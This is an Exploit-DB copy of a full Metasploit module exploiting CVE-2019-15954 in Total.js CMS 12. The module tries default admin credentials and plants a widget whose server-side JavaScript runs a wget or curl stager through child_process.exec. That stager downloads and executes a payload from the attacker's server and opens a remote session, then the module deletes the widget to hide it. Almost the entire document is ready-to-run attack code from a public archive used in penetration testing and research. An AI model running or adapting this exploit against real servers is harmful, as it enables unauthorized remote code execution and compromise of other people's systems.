Total.js CMS 12 – Widget JavaScript Code Injection (Metasploit)

  • 作者: Metasploit
    日期: 2019-10-22
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/47531/
  • ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Exploit::Remote
    Rank = ExcellentRanking
    
    include Msf::Exploit::Remote::HttpClient
    include Msf::Exploit::EXE
    include Msf::Exploit::CmdStager
    
    def initialize(info={})
    super(update_info(info,
    'Name' => 'Total.js CMS 12 Widget JavaScript Code Injection',
    'Description'=> %q{
    This module exploits a vulnerability in Total.js CMS. The issue is that a user with
    admin permission can embed a malicious JavaScript payload in a widget, which is
    evaluated server side, and gain remote code execution.
    },
    'License'=> MSF_LICENSE,
    'Author' =>
    [
    'Riccardo Krauter', # Original discovery
    'sinn3r'# Metasploit module
    ],
    'Arch' => [ARCH_X86, ARCH_X64],
    'Targets'=>
    [
    [ 'Total.js CMS on Linux', { 'Platform' => 'linux', 'CmdStagerFlavor' => 'wget'} ],
    [ 'Total.js CMS on Mac', { 'Platform' => 'osx', 'CmdStagerFlavor' => 'curl' } ]
    ],
    'References' =>
    [
    ['CVE', '2019-15954'],
    ['URL', 'https://seclists.org/fulldisclosure/2019/Sep/5'],
    ['URL', 'https://github.com/beerpwn/CVE/blob/master/Totaljs_disclosure_report/report_final.pdf']
    ],
    'DefaultOptions' =>
    {
    'RPORT' => 8000,
    },
    'Notes'=>
    {
    'SideEffects' => [ IOC_IN_LOGS ],
    'Reliability' => [ REPEATABLE_SESSION ],
    'Stability' => [ CRASH_SAFE ]
    },
    'Privileged' => false,
    'DisclosureDate' => '2019-08-30', # Reported to seclist
    'DefaultTarget'=> 0))
    
    register_options(
    [
    OptString.new('TARGETURI', [true, 'The base path for Total.js CMS', '/']),
    OptString.new('TOTALJSUSERNAME', [true, 'The username for Total.js admin', 'admin']),
    OptString.new('TOTALJSPASSWORD', [true, 'The password for Total.js admin', 'admin'])
    ])
    end
    
    class AdminToken
    attr_reader :token
    
    def initialize(cookie)
    @token = cookie.scan(/__admin=([a-zA-Z\d]+);/).flatten.first
    end
    
    def blank?
    token.blank?
    end
    end
    
    class Widget
    attr_reader :name
    attr_reader :category
    attr_reader :source_code
    attr_reader :platform
    attr_reader :url
    
    def initialize(p, u, stager)
    @name = "p_#{Rex::Text.rand_text_alpha(10)}"
    @category = 'content'
    @platform = p
    @url = u
    @source_code= %Q|<script total>|
    @source_code << %Q|global.process.mainModule.require('child_process')|
    @source_code << %Q|.exec("sleep 2;#{stager}");|
    @source_code << %Q|</script>|
    end
    end
    
    def check
    code = CheckCode::Safe
    
    res = send_request_cgi({
    'method' => 'GET',
    'uri'=> normalize_uri(target_uri.path, 'admin', 'widgets')
    })
    
    unless res
    vprint_error('Connection timed out')
    return CheckCode::Unknown
    end
    
    # If the admin's login page is visited too many times, we will start getting
    # a 401 (unauthorized response). In that case, we only have a header to work
    # with.
    if res.headers['X-Powered-By'].to_s == 'Total.js'
    code = CheckCode::Detected
    end
    
    # If we are here, then that means we can still see the login page.
    # Let's see if we can extract a version.
    html = res.get_html_document
    element = html.at('title')
    return code unless element.respond_to?(:text)
    title = element.text.scan(/CMS v([\d\.]+)/).flatten.first
    return code unless title
    version = Gem::Version.new(title)
    
    if version <= Gem::Version.new('12')
    # If we are able to check the version, we could try the default cred and attempt
    # to execute malicious code and see how the application responds. However, this
    # seems to a bit too aggressive so I'll leave that to the exploit part.
    return CheckCode::Appears
    end
    
    CheckCode::Safe
    end
    
    def auth(user, pass)
    json_body = { 'name' => user, 'password' => pass }.to_json
    
    res = send_request_cgi({
    'method' => 'POST',
    'uri' => normalize_uri(target_uri, 'api', 'login', 'admin'),
    'ctype'=> 'application/json',
    'data' => json_body
    })
    
    unless res
    fail_with(Failure::Unknown, 'Connection timed out')
    end
    
    json_res = res.get_json_document
    cookies = res.get_cookies
    # If it's an array it could be an error, so we are specifically looking for a hash.
    if json_res.kind_of?(Hash) && json_res['success']
    token = AdminToken.new(cookies)
    @admin_token = token
    return token
    end
    fail_with(Failure::NoAccess, 'Invalid username or password')
    end
    
    def create_widget(admin_token)
    platform = target.platform.names.first
    host = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket::source_address : datastore['SRVHOST']
    port = datastore['SRVPORT']
    proto = datastore['SSL'] ? 'https' : 'http'
    payload_name = "p_#{Rex::Text.rand_text_alpha(5)}"
    url = "#{proto}://#{host}:#{port}#{get_resource}/#{payload_name}"
    widget = Widget.new(platform, url, generate_cmdstager(
    'Path' => "#{get_resource}/#{payload_name}",
    'temp' => '/tmp',
    'file' => payload_name
    ).join(';'))
    
    json_body = {
    'name' => widget.name,
    'category' => widget.category,
    'body' => widget.source_code
    }.to_json
    
    res = send_request_cgi({
    'method' => 'POST',
    'uri'=> normalize_uri(target_uri.path, 'admin', 'api', 'widgets'),
    'cookie' => "__admin=#{admin_token.token}",
    'ctype'=> 'application/json',
    'data' => json_body
    })
    
    unless res
    fail_with(Failure::Unknown, 'Connection timed out')
    end
    
    res_json = res.get_json_document
    if res_json.kind_of?(Hash) && res_json['success']
    print_good("Widget created successfully")
    else
    fail_with(Failure::Unknown, 'No success message in body')
    end
    
    widget
    end
    
    def get_widget_item(admin_token, widget)
    res = send_request_cgi({
    'method' => 'GET',
    'uri'=> normalize_uri(target_uri.path, 'admin', 'api', 'widgets'),
    'cookie' => "__admin=#{admin_token.token}",
    'ctype'=> 'application/json'
    })
    
    unless res
    fail_with(Failure::Unknown, 'Connection timed out')
    end
    
    res_json = res.get_json_document
    count = res_json['count']
    items = res_json['items']
    
    unless count
    fail_with(Failure::Unknown, 'No count key found in body')
    end
    
    unless items
    fail_with(Failure::Unknown, 'No items key found in body')
    end
    
    items.each do |item|
    widget_name = item['name']
    if widget_name.match(/p_/)
    return item
    end
    end
    
    []
    end
    
    def clear_widget
    admin_token = get_admin_token
    widget = get_widget
    
    print_status('Finding the payload from the widget list...')
    item = get_widget_item(admin_token, widget)
    
    json_body = {
    'id'=> item['id'],
    'picture' => item['picture'],
    'name'=> item['name'],
    'icon'=> item['icon'],
    'category'=> item['category'],
    'datecreated' => item['datecreated'],
    'reference' => item['reference']
    }.to_json
    
    res = send_request_cgi({
    'method' => 'DELETE',
    'uri'=> normalize_uri(target_uri.path, 'admin', 'api', 'widgets'),
    'cookie' => "__admin=#{admin_token.token}",
    'ctype'=> 'application/json',
    'data' => json_body
    })
    
    unless res
    fail_with(Failure::Unknown, 'Connection timed out')
    end
    
    res_json = res.get_json_document
    if res_json.kind_of?(Hash) && res_json['success']
    print_good("Widget cleared successfully")
    else
    fail_with(Failure::Unknown, 'No success message in body')
    end
    end
    
    def on_request_uri(cli, req)
    print_status("#{cli.peerhost} requesting: #{req.uri}")
    
    if req.uri =~ /p_.+/
    payload_exe = generate_payload_exe(code: payload.encoded)
    print_status("Sending payload to #{cli.peerhost}")
    send_response(cli, payload_exe, {'Content-Type' => 'application/octet-stream'})
    return
    end
    
    send_not_found(cli)
    end
    
    def on_new_session(session)
    clear_widget
    end
    
    # This is kind of for cleaning up the wiget, because we cannot pass it as an
    # argument in on_new_session.
    def get_widget
    @widget
    end
    
    # This is also kind of for cleaning up widget, because we cannot pass it as an
    # argument directly
    def get_admin_token
    @admin_token
    end
    
    def exploit
    user = datastore['TOTALJSUSERNAME']
    pass = datastore['TOTALJSPASSWORD']
    print_status("Attempting to authenticate with #{user}:#{pass}")
    admin_token = auth(user, pass)
    fail_with(Failure::Unknown, 'No admin token found') if admin_token.blank?
    print_good("Authenticatd as: #{user}:#{pass}")
    print_status("Creating a widget...")
    @widget = create_widget(admin_token)
    super
    end
    
    end